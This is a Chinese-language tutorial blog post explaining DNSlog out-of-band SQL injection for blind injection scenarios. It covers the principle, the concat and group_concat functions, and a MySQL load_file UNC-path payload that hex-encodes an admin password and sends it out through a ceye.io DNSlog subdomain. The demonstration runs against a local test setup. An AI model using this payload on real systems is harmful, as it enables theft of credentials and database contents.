SQL注入-DNS注入（二）

其实就是盲注的简化版本，不过这种方式确实简单，不需要写py脚本一点点去跑

参考文章：

https://www.jianshu.com/p/c805209244c2 这篇文章基本上算入门，简单介绍了介绍DNS盲注

https://www.anquanke.com/post/id/98096 安全客的文章，写的也不错！

0x01、关于DNSlog在Web攻击的利用

DNSlog在Web漏洞利用中已经是老生常谈的问题，简单理解就是在某些无法直接利用漏洞获得回显的情况下，但是目标可以发起DNS请求，这个时候就可以通过这种方式把想获得的数据外带出来。

0x02、常用在哪些情况下

SQL注入中的盲注
无回显的命令执行
无回显的SSRF

0x03、Dnslog攻击的基本原理

如图所示，作为攻击者，提交注入语句，让数据库把需要查询的值和域名拼接起来，然后发生DNS查询，我们只要能获得DNS的日志，就得到了想要的值。所以我们需要有一个自己的域名，然后在域名商处配置一条NS记录，然后我们在NS服务器上面获取DNS日志即可。

这里先普及个SQL命令，contact() 函数和group_concat（）函数

一、concat()函数
CONCAT（）函数用于将多个字符串连接成一个字符串。

函数的语法就是 select contact( id , name ) from wechat.students ;

如果想要把查出来的数据中加个逗号的话，就这么写 select contact( id , ' , ' , name ) from wechat.students ; 最好加个空格，不加空格看着别扭，数据直接连在一起

但是这个函数有个特点就是，如果查询的一个字段中有空的数据，那么返回的结果都是空

二、group_concat（）函数

将查询结果用半角都好连接起来，一般用在group by分组查询语句中。

eg：select group_concat(tag_name) from content_topic_tag_ref where topic_id = 50;

返回结果：123,abc,456

concat() 和 group_concat() 两个函数都可以将数据整合查出来，但是区别就是group_concat()函数查出来的是整体一行，就是把所有数据整合到一行上面，而concat()函数查出来是分行的

0x04、Dnslog在常见数据库中SQL注入的实战

这里主要列举了4种数据库，MySQL、MSSQL、PostgreSQL、Oracle。

本次演示一个最常见的注入场景，就是WHERE后面条件处的注入。实验环境有一个test_user表，三个字段id、user、pass。如下

最后想要达到的目的是通过DNS外带的方式查询到pass字段的内容。

此处就不再自己搭建一个DNS服务器了，直接用ceye.io这个平台吧，这个平台就集成了Dnslog的功能。

1、MySQL

1） load_file

MySQL应该是在实战中利用Dnslog最多的，所以先来说说它吧。

在MySQL中有个一个load_file函数可以用来读取本地的文件。

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass)
FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc'))

可以看到，这里查出来的数据也就是 6164Dxxxxxxxxxxxx 这个数据拼接在了 .mysql.xxxxxx 网址的前面

可以看到test_user中的pass字段的值的Hex码就被查询出来了，为什么这个地方Hex编码的目的就是减少干扰，因为很多事数据库字段的值可能是有特殊符号的，这些特殊符号拼接在域名里是无法做dns查询的，因为域名是有一定的规范，有些特殊符号是不能带入的。

注意：load_file函数在Linux下是无法用来做dnslog攻击的，因为在这里就涉及到Windows的一个小Tips——UNC路径。

这个具体不研究，主要意义不大了，用DNS注入本来就是省略了盲注的时间，这样反而适得其反。

详细文章参考

https://www.anquanke.com/post/id/98096

总体来说 DNS注入只适合 iis 服务器系列的盲注。